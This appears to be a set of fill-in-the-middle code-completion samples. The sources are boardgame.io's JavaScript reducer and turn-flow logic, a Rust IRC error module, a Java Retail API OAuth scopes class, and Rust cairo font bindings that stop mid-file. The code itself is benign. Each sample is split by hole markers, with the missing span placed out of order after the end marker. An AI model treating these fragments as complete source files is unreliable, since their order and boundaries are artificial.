const action = gameEvent('endPhase', arg);
const { _stateID } = state;
const logEntry = { action, _stateID, turn, phase };
if (automatic)
logEntry.automatic = true;
const deltalog = [...(state.deltalog || []), logEntry];
return { ...state, G, ctx, deltalog };
}
function EndTurn(state, { arg, next, turn: initialTurn, force, automatic, playerID }) {
// This is not the turn that EndTurn was originally
// called for. The turn was probably ended some other way.
if (initialTurn !== state.ctx.turn) {
return state;
}
const { currentPlayer, numMoves, phase, turn } = state.ctx;
const phaseConfig = GetPhase(state.ctx);
// Prevent ending the turn if moveLimit hasn't been reached.
const currentPlayerMoves = numMoves || 0;
if (!force &&
phaseConfig.turn.moveLimit &&
currentPlayerMoves < phaseConfig.turn.moveLimit) {
info(`cannot end turn before making ${phaseConfig.turn.moveLimit} moves`);
return state;
}
// Run turn-end triggers.
const G = phaseConfig.turn.wrapped.onEnd(state);
if (next) {
next.push({ fn: UpdateTurn, arg, currentPlayer });
}
// Reset activePlayers.
let ctx = { ...state.ctx, activePlayers: null };
// Remove player from playerOrder
if (arg && arg.remove) {
playerID = playerID || currentPlayer;
const playOrder = ctx.playOrder.filter((i) => i != playerID);
const playOrderPos = ctx.playOrderPos > playOrder.length - 1 ? 0 : ctx.playOrderPos;
ctx = { ...ctx, playOrder, playOrderPos };
if (playOrder.length === 0) {
next.push({ fn: EndPhase, turn, phase });
return state;
}
}
// Create log entry.
const action = gameEvent('endTurn', arg);
const { _stateID } = state;
const logEntry = { action, _stateID, turn, phase };
if (automatic)
logEntry.automatic = true;
const deltalog = [...(state.deltalog || []), logEntry];
return { ...state, G, ctx, deltalog, _undo: [], _redo: [] };
}
function EndStage(state, { arg, next, automatic, playerID }) {
playerID = playerID || state.ctx.currentPlayer;
let { ctx, _stateID } = state;
let { activePlayers, _activePlayersMoveLimit, phase, turn } = ctx;
const playerInStage = activePlayers !== null && playerID in activePlayers;
if (!arg && playerInStage) {
const phaseConfig = GetPhase(ctx);
const stage = phaseConfig.turn.stages[activePlayers[playerID]];
if (stage && stage.next)
arg = stage.next;
}
// Checking if arg is a valid stage, even Stage.NULL
if (next) {
next.push({ fn: UpdateStage, arg, playerID });
}
// If player isn’t in a stage, there is nothing else to do.
if (!playerInStage)
return state;
// Remove player from activePlayers.
activePlayers = { ...activePlayers };
delete activePlayers[playerID];
if (_activePlayersMoveLimit) {
// Remove player from _activePlayersMoveLimit.
_activePlayersMoveLimit = { ..._activePlayersMoveLimit };
delete _activePlayersMoveLimit[playerID];
}
ctx = UpdateActivePlayersOnceEmpty({
...ctx,
activePlayers,
_activePlayersMoveLimit,
});
// Create log entry.
const action = gameEvent('endStage', arg);
const logEntry = { action, _stateID, turn, phase };
if (automatic)
logEntry.automatic = true;
const deltalog = [...(state.deltalog || []), logEntry];
return { ...state, ctx, deltalog };
}
/**
* Retrieves the relevant move that can be played by playerID.
*
* If ctx.activePlayers is set (i.e. one or more players are in some stage),
* then it attempts to find the move inside the stages config for
* that turn. If the stage for a player is '', then the player is
* allowed to make a move (as determined by the phase config), but
* isn't restricted to a particular set as defined in the stage config.
*
* If not, it then looks for the move inside the phase.
*
* If it doesn't find the move there, it looks at the global move definition.
*
* @param {object} ctx
* @param {string} name
* @param {string} playerID
*/
function GetMove(ctx, name, playerID) {
const phaseConfig = GetPhase(ctx);
const stages = phaseConfig.turn.stages;
const { activePlayers } = ctx;
if (activePlayers &&
activePlayers[playerID] !== undefined &&
activePlayers[playerID] !== Stage.NULL &&
stages[activePlayers[playerID]] !== undefined &&
stages[activePlayers[playerID]].moves !== undefined) {
// Check if moves are defined for the player's stage.
const stage = stages[activePlayers[playerID]];
const moves = stage.moves;
if (name in moves) {
return moves[name];
}
}
else if (phaseConfig.moves) {
// Check if moves are defined for the current phase.
if (name in phaseConfig.moves) {
return phaseConfig.moves[name];
}
}
else if (name in moves) {
// Check for the move globally.
return moves[name];
}
return null;
}
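// Example (sketch with hypothetical move names): given
//   ctx.activePlayers = { '0': 'discard' }
// and a stage config { discard: { moves: { discardCard } } },
// GetMove(ctx, 'discardCard', '0') resolves from the stage config, while
// GetMove(ctx, 'draw', '1') falls back to the phase moves and then to the
// global move map.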
function ProcessMove(state, action) {
const { playerID, type } = action;
const { ctx } = state;
const { currentPlayer, activePlayers, _activePlayersMoveLimit } = ctx;
const move = GetMove(ctx, type, playerID);
const shouldCount = !move || typeof move === 'function' || move.noLimit !== true;
let { numMoves, _activePlayersNumMoves } = ctx;
if (shouldCount) {
if (playerID === currentPlayer)
numMoves++;
if (activePlayers)
_activePlayersNumMoves[playerID]++;
}
state = {
...state,
ctx: {
...ctx,
numMoves,
_activePlayersNumMoves,
},
};
if (_activePlayersMoveLimit &&
_activePlayersNumMoves[playerID] >= _activePlayersMoveLimit[playerID]) {
state = EndStage(state, { playerID, automatic: true });
}
const phaseConfig = GetPhase(ctx);
const G = phaseConfig.turn.wrapped.onMove(state);
state = { ...state, G };
const events = [{ fn: OnMove }];
return Process(state, events);
}
function SetStageEvent(state, playerID, arg) {
return Process(state, [{ fn: EndStage, arg, playerID }]);
}
function EndStageEvent(state, playerID) {
return Process(state, [{ fn: EndStage, playerID }]);
}
function SetPhaseEvent(state, _playerID, newPhase) {
return Process(state, [
{
fn: EndPhase,
phase: state.ctx.phase,
turn: state.ctx.turn,
arg: { next: newPhase },
},
]);
}
function EndPhaseEvent(state) {
return Process(state, [
{ fn: EndPhase, phase: state.ctx.phase, turn: state.ctx.turn },
]);
}
function EndTurnEvent(state, _playerID, arg) {
return Process(state, [
{ fn: EndTurn, turn: state.ctx.turn, phase: state.ctx.phase, arg },
]);
}
function PassEvent(state, _playerID, arg) {
return Process(state, [
{
fn: EndTurn,
turn: state.ctx.turn,
phase: state.ctx.phase,
force: true,
arg,
},
]);
}
function EndGameEvent(state, _playerID, arg) {
return Process(state, [
{ fn: EndGame, turn: state.ctx.turn, phase: state.ctx.phase, arg },
]);
}
const eventHandlers = {
endStage: EndStageEvent,
setStage: SetStageEvent,
endTurn: EndTurnEvent,
pass: PassEvent,
endPhase: EndPhaseEvent,
setPhase: SetPhaseEvent,
endGame: EndGameEvent,
setActivePlayers: SetActivePlayersEvent,
};
const enabledEventNames = [];
if (events.endTurn !== false) {
enabledEventNames.push('endTurn');
}
if (events.pass !== false) {
enabledEventNames.push('pass');
}
if (events.endPhase !== false) {
enabledEventNames.push('endPhase');
}
if (events.setPhase !== false) {
enabledEventNames.push('setPhase');
}
if (events.endGame !== false) {
enabledEventNames.push('endGame');
}
if (events.setActivePlayers !== false) {
enabledEventNames.push('setActivePlayers');
}
if (events.endStage !== false) {
enabledEventNames.push('endStage');
}
if (events.setStage !== false) {
enabledEventNames.push('setStage');
}
function ProcessEvent(state, action) {
const { type, playerID, args } = action.payload;
if (typeof eventHandlers[type] !== 'function')
return state;
return eventHandlers[type](state, playerID, ...(Array.isArray(args) ? args : [args]));
}
function IsPlayerActive(_G, ctx, playerID) {
if (ctx.activePlayers) {
return playerID in ctx.activePlayers;
}
return ctx.currentPlayer === playerID;
}
return {
ctx: (numPlayers) => ({
numPlayers,
turn: 0,
currentPlayer: '0',
playOrder: [...Array.from({ length: numPlayers })].map((_, i) => i + ''),
playOrderPos: 0,
phase: startingPhase,
activePlayers: null,
}),
init: (state) => {
return Process(state, [{ fn: StartGame }]);
},
isPlayerActive: IsPlayerActive,
eventHandlers,
eventNames: Object.keys(eventHandlers),
enabledEventNames,
moveMap,
moveNames: [...moveNames.values()],
processMove: ProcessMove,
processEvent: ProcessEvent,
getMove: GetMove,
};
}
/*
* Copyright 2017 The boardgame.io Authors
*
* Use of this source code is governed by a MIT-style
* license that can be found in the LICENSE file or at
* https://opensource.org/licenses/MIT.
*/
function IsProcessed(game) {
return game.processMove !== undefined;
}
/**
* Helper to generate the game move reducer. The returned
* reducer has the following signature:
*
* (G, action, ctx) => {}
*
* You can roll your own if you like, or use any Redux
* addon to generate such a reducer.
*
* The convention used in this framework is to
* have action.type contain the name of the move, and
* action.args contain any additional arguments as an
* Array.
*/
function ProcessGameConfig(game) {
// The Game() function has already been called on this
// config object, so just pass it through.
if (IsProcessed(game)) {
return game;
}
if (game.name === undefined)
game.name = 'default';
if (game.deltaState === undefined)
game.deltaState = false;
if (game.disableUndo === undefined)
game.disableUndo = false;
if (game.setup === undefined)
game.setup = () => ({});
if (game.moves === undefined)
game.moves = {};
if (game.playerView === undefined)
game.playerView = (G) => G;
if (game.plugins === undefined)
game.plugins = [];
game.plugins.forEach((plugin) => {
if (plugin.name === undefined) {
throw new Error('Plugin missing name attribute');
}
if (plugin.name.includes(' ')) {
throw new Error(plugin.name + ': Plugin name must not include spaces');
}
});
if (game.name.includes(' ')) {
throw new Error(game.name + ': Game name must not include spaces');
}
const flow = Flow(game);
return {
...game,
flow,
moveNames: flow.moveNames,
pluginNames: game.plugins.map((p) => p.name),
processMove: (state, action) => {
let moveFn = flow.getMove(state.ctx, action.type, action.playerID);
if (IsLongFormMove(moveFn)) {
moveFn = moveFn.move;
}
if (moveFn instanceof Function) {
const fn = FnWrap(moveFn, game.plugins);
const ctxWithAPI = {
...EnhanceCtx(state),
playerID: action.playerID,
};
let args = [];
if (action.args !== undefined) {
args = Array.isArray(action.args) ? action.args : [action.args];
}
return fn(state.G, ctxWithAPI, ...args);
}
error(`invalid move object: ${action.type}`);
return state.G;
},
};
}
function IsLongFormMove(move) {
return move instanceof Object && move.move !== undefined;
}
/*
* Copyright 2017 The boardgame.io Authors
*
* Use of this source code is governed by a MIT-style
* license that can be found in the LICENSE file or at
* https://opensource.org/licenses/MIT.
*/
var UpdateErrorType;
(function (UpdateErrorType) {
// The action’s credentials were missing or invalid
UpdateErrorType["UnauthorizedAction"] = "update/unauthorized_action";
// The action’s matchID was not found
UpdateErrorType["MatchNotFound"] = "update/match_not_found";
// Could not apply Patch operation (rfc6902).
UpdateErrorType["PatchFailed"] = "update/patch_failed";
})(UpdateErrorType || (UpdateErrorType = {}));
var ActionErrorType;
(function (ActionErrorType) {
// The action contained a stale state ID
ActionErrorType["StaleStateId"] = "action/stale_state_id";
// The requested move is unknown or not currently available
ActionErrorType["UnavailableMove"] = "action/unavailable_move";
// The move declared it was invalid (INVALID_MOVE constant)
ActionErrorType["InvalidMove"] = "action/invalid_move";
// The player making the action is not currently active
ActionErrorType["InactivePlayer"] = "action/inactive_player";
// The game has finished
ActionErrorType["GameOver"] = "action/gameover";
// The requested action is disabled (e.g. undo/redo, events)
ActionErrorType["ActionDisabled"] = "action/action_disabled";
// The requested action is not currently possible
ActionErrorType["ActionInvalid"] = "action/action_invalid";
// The requested action was declared invalid by a plugin
ActionErrorType["PluginActionInvalid"] = "action/plugin_invalid";
})(ActionErrorType || (ActionErrorType = {}));
/*
* Copyright 2017 The boardgame.io Authors
*
* Use of this source code is governed by a MIT-style
* license that can be found in the LICENSE file or at
* https://opensource.org/licenses/MIT.
*/
/**
* Check if the payload for the passed action contains a playerID.
*/
const actionHasPlayerID = (action) => action.payload.playerID !== null && action.payload.playerID !== undefined;
/**
* Returns true if a move can be undone.
*/
const CanUndoMove = (G, ctx, move) => {
function HasUndoable(move) {
return move.undoable !== undefined;
}
function IsFunction(undoable) {
return undoable instanceof Function;
}
if (!HasUndoable(move)) {
return true;
}
if (IsFunction(move.undoable)) {
return move.undoable(G, ctx);
}
return move.undoable;
};
/**
* Update the undo and redo stacks for a move or event.
*/
function updateUndoRedoState(state, opts) {
if (opts.game.disableUndo)
return state;
const undoEntry = {
G: state.G,
ctx: state.ctx,
plugins: state.plugins,
playerID: opts.action.payload.playerID || state.ctx.currentPlayer,
};
if (opts.action.type === 'MAKE_MOVE') {
undoEntry.moveType = opts.action.payload.type;
}
return {
...state,
_undo: [...state._undo, undoEntry],
// Always reset redo stack when making a move or event
_redo: [],
};
}
/**
* Process state, adding the initial deltalog for this action.
*/
function initializeDeltalog(state, action, move) {
// Create a log entry for this action.
const logEntry = {
action,
_stateID: state._stateID,
turn: state.ctx.turn,
phase: state.ctx.phase,
};
const pluginLogMetadata = state.plugins.log.data.metadata;
if (pluginLogMetadata !== undefined) {
logEntry.metadata = pluginLogMetadata;
}
if (typeof move === 'object' && move.redact === true) {
logEntry.redact = true;
}
return {
...state,
deltalog: [logEntry],
};
}
/**
* Update plugin state after move/event & check if plugins consider the action to be valid.
* @param state Current version of state in the reducer.
* @param oldState State to revert to in case of error.
* @param pluginOpts Plugin configuration options.
* @returns Tuple of the new state updated after flushing plugins and the old
* state augmented with an error if a plugin declared the action invalid.
*/
<|fim▁hole|> const [newState, isInvalid] = FlushAndValidate(state, pluginOpts);
if (!isInvalid)
return [newState];
return [
newState,
WithError(oldState, ActionErrorType.PluginActionInvalid, isInvalid),
];
}
/**
* ExtractTransientsFromState
*
* Split out transients from the a TransientState
*/
function ExtractTransients(transientState) {
if (!transientState) {
// We preserve null for the state for legacy callers, but the transient
// field should be undefined if not present to be consistent with the
// code path below.
return [null, undefined];
}
const { transients, ...state } = transientState;
return [state, transients];
}
/**
* WithError
*
* Augment a State instance with transient error information.
*/
function WithError(state, errorType, payload) {
const error = {
type: errorType,
payload,
};
return {
...state,
transients: {
error,
},
};
}
/**
* Middleware for processing TransientState associated with the reducer
* returned by CreateGameReducer.
* This should pretty much be used everywhere you want realistic state
* transitions and error handling.
*/
const TransientHandlingMiddleware = (store) => (next) => (action) => {
const result = next(action);
switch (action.type) {
case STRIP_TRANSIENTS: {
return result;
}
default: {
const [, transients] = ExtractTransients(store.getState());
if (typeof transients !== 'undefined') {
store.dispatch(stripTransients());
// Dev Note: If parent middleware needs to correlate the spawned
// StripTransients action to the triggering action, instrument here.
//
// This is a bit tricky; for more details, see:
// https://github.com/boardgameio/boardgame.io/pull/940#discussion_r636200648
return {
...result,
transients,
};
}
return result;
}
}
};
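// Sketch of assumed wiring (not shown in this file): installing this middleware
// via Redux's applyMiddleware(TransientHandlingMiddleware) lets callers read
// `result.transients` from dispatch(), while the stored state stays clean
// because stripTransients() is dispatched right after any action that produced
// transient errors.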
/**
* CreateGameReducer
*
* Creates the main game state reducer.
*/
function CreateGameReducer({ game, isClient, }) {
game = ProcessGameConfig(game);
/**
* GameReducer
*
* Redux reducer that maintains the overall game state.
* @param {object} state - The state before the action.
* @param {object} action - A Redux action.
*/
return (stateWithTransients = null, action) => {
let [state /*, transients */] = ExtractTransients(stateWithTransients);
switch (action.type) {
case STRIP_TRANSIENTS: {
// This action indicates that transient metadata in the state has been
// consumed and should now be stripped from the state.
return state;
}
case GAME_EVENT: {
state = { ...state, deltalog: [] };
// Process game events only on the server.
// These events like `endTurn` typically
// contain code that may rely on secret state
// and cannot be computed on the client.
if (isClient) {
return state;
}
// Disallow events once the game is over.
if (state.ctx.gameover !== undefined) {
error(`cannot call event after game end`);
return WithError(state, ActionErrorType.GameOver);
}
// Ignore the event if the player isn't active.
if (actionHasPlayerID(action) &&
!game.flow.isPlayerActive(state.G, state.ctx, action.payload.playerID)) {
error(`disallowed event: ${action.payload.type}`);
return WithError(state, ActionErrorType.InactivePlayer);
}
// Execute plugins.
state = Enhance(state, {
game,
isClient: false,
playerID: action.payload.playerID,
});
// Process event.
let newState = game.flow.processEvent(state, action);
// Execute plugins.
let stateWithError;
[newState, stateWithError] = flushAndValidatePlugins(newState, state, {
game,
isClient: false,
});
if (stateWithError)
return stateWithError;
// Update undo / redo state.
newState = updateUndoRedoState(newState, { game, action });
return { ...newState, _stateID: state._stateID + 1 };
}
case MAKE_MOVE: {
const oldState = (state = { ...state, deltalog: [] });
// Check whether the move is allowed at this time.
const move = game.flow.getMove(state.ctx, action.payload.type, action.payload.playerID || state.ctx.currentPlayer);
if (move === null) {
error(`disallowed move: ${action.payload.type}`);
return WithError(state, ActionErrorType.UnavailableMove);
}
// Don't run move on client if move says so.
if (isClient && move.client === false) {
return state;
}
// Disallow moves once the game is over.
if (state.ctx.gameover !== undefined) {
error(`cannot make move after game end`);
return WithError(state, ActionErrorType.GameOver);
}
// Ignore the move if the player isn't active.
if (actionHasPlayerID(action) &&
!game.flow.isPlayerActive(state.G, state.ctx, action.payload.playerID)) {
error(`disallowed move: ${action.payload.type}`);
return WithError(state, ActionErrorType.InactivePlayer);
}
// Execute plugins.
state = Enhance(state, {
game,
isClient,
playerID: action.payload.playerID,
});
// Process the move.
const G = game.processMove(state, action.payload);
// The game declared the move as invalid.
if (G === INVALID_MOVE) {
error(`invalid move: ${action.payload.type} args: ${action.payload.args}`);
// TODO(#723): Marshal a nice error payload with the processed move.
return WithError(state, ActionErrorType.InvalidMove);
}
const newState = { ...state, G };
// Some plugin indicated that it is not suitable to be
// materialized on the client (and must wait for the server
// response instead).
if (isClient && NoClient(newState, { game })) {
return state;
}
state = newState;
            // If we're on the client in multiplayer mode, process only the
            // move itself and skip triggers. Those are processed on the
            // server, which will send back a state update.
if (isClient) {
let stateWithError;
[state, stateWithError] = flushAndValidatePlugins(state, oldState, {
game,
isClient: true,
});
if (stateWithError)
return stateWithError;
return {
...state,
_stateID: state._stateID + 1,
};
}
// On the server, construct the deltalog.
state = initializeDeltalog(state, action, move);
// Allow the flow reducer to process any triggers that happen after moves.
state = game.flow.processMove(state, action.payload);
let stateWithError;
[state, stateWithError] = flushAndValidatePlugins(state, oldState, {
game,
});
if (stateWithError)
return stateWithError;
// Update undo / redo state.
state = updateUndoRedoState(state, { game, action });
return {
...state,
_stateID: state._stateID + 1,
};
}
case RESET:
case UPDATE:
case SYNC: {
return action.state;
}
case UNDO: {
state = { ...state, deltalog: [] };
if (game.disableUndo) {
error('Undo is not enabled');
return WithError(state, ActionErrorType.ActionDisabled);
}
const { G, ctx, _undo, _redo, _stateID } = state;
if (_undo.length < 2) {
error(`No moves to undo`);
return WithError(state, ActionErrorType.ActionInvalid);
}
const last = _undo[_undo.length - 1];
const restore = _undo[_undo.length - 2];
// Only allow players to undo their own moves.
if (actionHasPlayerID(action) &&
action.payload.playerID !== last.playerID) {
error(`Cannot undo other players' moves`);
return WithError(state, ActionErrorType.ActionInvalid);
}
// If undoing a move, check it is undoable.
if (last.moveType) {
const lastMove = game.flow.getMove(restore.ctx, last.moveType, last.playerID);
if (!CanUndoMove(G, ctx, lastMove)) {
error(`Move cannot be undone`);
return WithError(state, ActionErrorType.ActionInvalid);
}
}
state = initializeDeltalog(state, action);
return {
...state,
G: restore.G,
ctx: restore.ctx,
plugins: restore.plugins,
_stateID: _stateID + 1,
_undo: _undo.slice(0, -1),
_redo: [last, ..._redo],
};
}
case REDO: {
state = { ...state, deltalog: [] };
if (game.disableUndo) {
error('Redo is not enabled');
return WithError(state, ActionErrorType.ActionDisabled);
}
const { _undo, _redo, _stateID } = state;
if (_redo.length === 0) {
error(`No moves to redo`);
return WithError(state, ActionErrorType.ActionInvalid);
}
const first = _redo[0];
// Only allow players to redo their own undos.
if (actionHasPlayerID(action) &&
action.payload.playerID !== first.playerID) {
error(`Cannot redo other players' moves`);
return WithError(state, ActionErrorType.ActionInvalid);
}
state = initializeDeltalog(state, action);
return {
...state,
G: first.G,
ctx: first.ctx,
plugins: first.plugins,
_stateID: _stateID + 1,
_undo: [..._undo, first],
_redo: _redo.slice(1),
};
}
case PLUGIN: {
// TODO(#723): Expose error semantics to plugin processing.
return ProcessAction(state, action, { game });
}
case PATCH: {
const oldState = state;
const newState = JSON.parse(JSON.stringify(oldState));
const patchError = applyPatch(newState, action.patch);
const hasError = patchError.some((entry) => entry !== null);
if (hasError) {
error(`Patch ${JSON.stringify(action.patch)} apply failed`);
return WithError(oldState, UpdateErrorType.PatchFailed, patchError);
}
else {
return newState;
}
}
default: {
return state;
}
}
};
}
export { CreateGameReducer as C, IsLongFormMove as I, ProcessGameConfig as P, TransientHandlingMiddleware as T };<|fim▁end|>
|
function flushAndValidatePlugins(state, oldState, pluginOpts) {
|
<|file_name|>error.rs<|end_file_name|><|fim▁begin|>//! IRC protocol errors using `thiserror`.
use thiserror::Error;
/// A `Result` type for IRC `ProtocolErrors`.
pub type Result<T, E = ProtocolError> = ::std::result::Result<T, E>;
/// An IRC protocol error.
#[derive(Debug, Error)]
pub enum ProtocolError {
/// An internal I/O error.
#[error("an io error occurred")]
Io(#[source] std::io::Error),
/// Error for invalid messages.
#[error("invalid message: {}", string)]
InvalidMessage {
/// The string that failed to parse.
string: String,
/// The detailed message parsing error.
#[source]
cause: MessageParseError,
},
}
impl From<std::io::Error> for ProtocolError {
fn from(e: std::io::Error) -> ProtocolError {
ProtocolError::Io(e)
}
}
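// A minimal, test-only sketch of how the `From` impl above lets the `?`
// operator convert `std::io::Error` into `ProtocolError` automatically.
#[cfg(test)]
mod io_conversion_sketch {
    use super::ProtocolError;

    fn read_something() -> Result<(), ProtocolError> {
        // `?` applies `From<std::io::Error> for ProtocolError` here.
        let _file = std::fs::File::open("no-such-file")?;
        Ok(())
    }

    #[test]
    fn io_errors_convert_via_question_mark() {
        assert!(matches!(read_something(), Err(ProtocolError::Io(_))));
    }
}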
/// Errors that occur when parsing messages.
#[derive(Debug, Error)]
pub enum MessageParseError {
/// The message was empty.
#[error("empty message")]
EmptyMessage,
/// The command was invalid (i.e. missing).
#[error("invalid command")]
InvalidCommand,
/// The mode string was malformed.
#[error("invalid mode string: {}", string)]
InvalidModeString {
/// The invalid mode string.
string: String,
/// The detailed mode parsing error.
#[source]
cause: ModeParseError,
},
/// The subcommand used was invalid.
#[error("invalid {} subcommand: {}", cmd, sub)]
InvalidSubcommand {
/// The command whose invalid subcommand was referenced.
cmd: &'static str,
/// The invalid subcommand.
sub: String,
},
}
/// Errors that occur while parsing mode strings.
#[derive(Debug, Error)]
pub enum ModeParseError {
/// Invalid modifier used in a mode string (only + and - are valid).
#[error("invalid mode modifier: {}", modifier)]
InvalidModeModifier {
/// The invalid mode modifier.
modifier: char,
},<|fim▁hole|> /// Missing modifier used in a mode string.
#[error("missing mode modifier")]
MissingModeModifier,
}<|fim▁end|>
| |
<|file_name|>CloudRetailScopes.java<|end_file_name|><|fim▁begin|>/*<|fim▁hole|> * in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
/*
* This code was generated by https://github.com/googleapis/google-api-java-client-services/
* Modify at your own risk.
*/
package com.google.api.services.retail.v2;
/**
* Available OAuth 2.0 scopes for use with the Retail API.
*
* @since 1.4
*/
public class CloudRetailScopes {
  /** See, edit, configure, and delete your Google Cloud data and see the email address for your Google Account. */
public static final String CLOUD_PLATFORM = "https://www.googleapis.com/auth/cloud-platform";
/**
* Returns an unmodifiable set that contains all scopes declared by this class.
*
* @since 1.16
*/
public static java.util.Set<String> all() {
java.util.Set<String> set = new java.util.HashSet<String>();
set.add(CLOUD_PLATFORM);
return java.util.Collections.unmodifiableSet(set);
}
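  // A short usage sketch (hypothetical; `GoogleCredentials` comes from the
  // google-auth-library and its exact API may differ by version):
  //
  //   GoogleCredentials credentials = GoogleCredentials.getApplicationDefault()
  //       .createScoped(CloudRetailScopes.all());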
private CloudRetailScopes() {
}
}<|fim▁end|>
|
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
|
<|file_name|>fonts.rs<|end_file_name|><|fim▁begin|>// Copyright 2013-2015, The Gtk-rs Project Developers.
// See the COPYRIGHT file at the top-level directory of this distribution.
// Licensed under the MIT license, see the LICENSE file or <http://opensource.org/licenses/MIT>
use glib::translate::*;
use std::clone::Clone;
use std::cmp::PartialEq;
use std::ops::Drop;
use ffi;
use ffi::enums::{
Antialias,
SubpixelOrder,
HintStyle,
HintMetrics,
FontType,
FontWeight,
FontSlant,
};
use ::matrices::Matrix;
use ffi::{
cairo_font_options_t,
cairo_font_face_t,
cairo_scaled_font_t
};
pub use ffi::{
FontExtents,
Glyph,
TextCluster,
TextExtents
};
/* TODO
Allocates an array of cairo_glyph_t's. This function is only useful in
implementations of cairo_user_scaled_font_text_to_glyphs_func_t where the user
needs to allocate an array of glyphs that cairo will free. For all other uses,
user can use their own allocation method for glyphs.
impl Glyph {
//pub fn cairo_glyph_allocate(num_glyphs: c_int) -> *Glyph;
//pub fn cairo_glyph_free(glyphs: *Glyph);
}
Allocates an array of cairo_text_cluster_t's. This function is only useful in
implementations of cairo_user_scaled_font_text_to_glyphs_func_t where the user
needs to allocate an array of text clusters that cairo will free. For all other
uses, the user can use their own allocation method for text clusters.
impl TextCluster {
//pub fn cairo_text_cluster_allocate(num_clusters: c_int) -> *TextCluster;
//pub fn cairo_text_cluster_free(clusters: *TextCluster);
}
*/
pub struct FontOptions(*mut cairo_font_options_t);
impl FontOptions {
pub fn new() -> FontOptions {
let font_options = unsafe {
FontOptions(ffi::cairo_font_options_create())
};
font_options.ensure_status();
font_options
}
#[doc(hidden)]
pub fn get_ptr(&self) -> *mut cairo_font_options_t {
let FontOptions(ptr) = *self;
ptr
}
pub fn ensure_status(&self) {
let status = unsafe {
ffi::cairo_font_options_status(self.get_ptr())
};
status.ensure_valid()
}
pub fn merge(&mut self, other: &mut FontOptions) {
unsafe {
ffi::cairo_font_options_merge(self.get_ptr(), other.get_ptr())
}
}
    pub fn hash(&self) -> u64 {
unsafe {
ffi::cairo_font_options_hash(self.get_ptr()) as u64
}
}
pub fn set_antialias(&self, antialias: Antialias) {
unsafe {
ffi::cairo_font_options_set_antialias(self.get_ptr(), antialias)
}
}
pub fn get_antialias(&self) -> Antialias {
unsafe {
ffi::cairo_font_options_get_antialias(self.get_ptr())
}
}
pub fn set_subpixel_order(&self, order: SubpixelOrder) {
unsafe {
ffi::cairo_font_options_set_subpixel_order(self.get_ptr(), order)
}
}
pub fn get_subpixel_order(&self) -> SubpixelOrder {
unsafe {
ffi::cairo_font_options_get_subpixel_order(self.get_ptr())
}
}
pub fn set_hint_style(&self, hint_style: HintStyle) {
unsafe {
ffi::cairo_font_options_set_hint_style(self.get_ptr(), hint_style)
}
}
pub fn get_hint_style(&self) -> HintStyle {
unsafe {
ffi::cairo_font_options_get_hint_style(self.get_ptr())
}
}
pub fn set_hint_metrics(&self, hint_metrics: HintMetrics) {
unsafe {
ffi::cairo_font_options_set_hint_metrics(self.get_ptr(), hint_metrics)
}
}
pub fn get_hint_metrics(&self) -> HintMetrics {
unsafe {
ffi::cairo_font_options_get_hint_metrics(self.get_ptr())
}
}
}
impl PartialEq for FontOptions {
fn eq(&self, other: &FontOptions) -> bool {
unsafe {
ffi::cairo_font_options_equal(self.get_ptr(), other.get_ptr()).as_bool()
}
}
}
<|fim▁hole|> unsafe {
FontOptions(ffi::cairo_font_options_copy(self.get_ptr()))
}
}
}
impl Drop for FontOptions {
fn drop(&mut self) {
unsafe {
ffi::cairo_font_options_destroy(self.get_ptr())
}
}
}
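// A short usage sketch for `FontOptions` (the exact `Antialias`/`HintStyle`
// variant names are assumptions and may differ between cairo-rs versions):
//
//     let options = FontOptions::new();
//     options.set_antialias(Antialias::Best);
//     options.set_hint_style(HintStyle::Full);
//     assert_eq!(options.get_antialias(), Antialias::Best);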
pub struct FontFace(pub *mut cairo_font_face_t);
impl FontFace {
#[doc(hidden)]
pub fn get_ptr(&self) -> *mut cairo_font_face_t {
let FontFace(ptr) = *self;
ptr
}
pub fn toy_create(family: &str, slant: FontSlant, weight: FontWeight) -> FontFace {
let font_face = FontFace(
unsafe {
ffi::cairo_toy_font_face_create(family.to_glib_none().0, slant, weight)
}
);
font_face.ensure_status();
font_face
}
pub fn toy_get_family(&self) -> Option<String> {
unsafe {
from_glib_none(ffi::cairo_toy_font_face_get_family(self.get_ptr()))
}
}
pub fn toy_get_slant(&self) -> FontSlant {
unsafe {
ffi::cairo_toy_font_face_get_slant(self.get_ptr())
}
}
pub fn toy_get_weight(&self) -> FontWeight {
unsafe {
ffi::cairo_toy_font_face_get_weight(self.get_ptr())
}
}
pub fn ensure_status(&self) {
let status = unsafe {
ffi::cairo_font_face_status(self.get_ptr())
};
status.ensure_valid()
}
pub fn get_type(&self) -> FontType {
unsafe {
ffi::cairo_font_face_get_type(self.get_ptr())
}
}
pub fn get_reference_count(&self) -> usize {
unsafe {
ffi::cairo_font_face_get_reference_count(self.get_ptr()) as usize
}
}
pub fn reference(&self) -> FontFace {
unsafe {
FontFace(ffi::cairo_font_face_reference(self.get_ptr()))
}
}
}
impl Drop for FontFace {
fn drop(&mut self) {
unsafe {
ffi::cairo_font_face_destroy(self.get_ptr())
}
}
}
pub struct ScaledFont(pub *mut cairo_scaled_font_t);
impl ScaledFont {
#[doc(hidden)]
pub fn get_ptr(&self) -> *mut cairo_scaled_font_t {
let ScaledFont(ptr) = *self;
ptr
}
pub fn new(font_face: FontFace, font_matrix: &mut Matrix, ctm: &mut Matrix, options: FontOptions) -> ScaledFont {
let scaled_font = unsafe {
ScaledFont(ffi::cairo_scaled_font_create(font_face.get_ptr(), font_matrix, ctm, options.get_ptr()))
};
scaled_font.ensure_status();
scaled_font
}
pub fn ensure_status(&self) {
let status = unsafe {
ffi::cairo_scaled_font_status(self.get_ptr())
};
status.ensure_valid()
}
pub fn get_type(&self) -> FontType {
unsafe {
ffi::cairo_scaled_font_get_type(self.get_ptr())
}
}
pub fn get_reference_count(&self) -> usize {
unsafe {
ffi::cairo_scaled_font_get_reference_count(self.get_ptr()) as usize
}
}
//pub fn cairo_scaled_font_extents(scaled_font: *mut cairo_scaled_font_t, extents: *mut cairo_font_extents_t);
// cairo_text_extents_t;
//pub fn cairo_scaled_font_text_extents(scaled_font: *mut cairo_scaled_font_t, utf8: *mut char, extents: *mut cairo_text_extents_t);
//pub fn cairo_scaled_font_glyph_extents(scaled_font: *mut cairo_scaled_font_t, glyphs: *mut Glyph, num_glyphs: c_int, extents: *mut cairo_text_extents_t);
